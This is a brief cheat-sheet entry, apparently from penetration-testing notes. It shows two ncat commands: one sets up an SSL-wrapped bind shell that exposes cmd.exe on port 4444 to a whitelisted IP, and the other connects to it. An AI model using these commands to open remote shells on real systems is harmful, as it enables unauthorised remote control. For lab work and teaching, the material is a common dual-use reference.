Netcat

Secure SSL Connection with whitelisting

ncat -lvp 4444 -e cmd.exe --allow <ip-address> --ssl
ncat -v <ip-address> 4444 --ssl

Last updated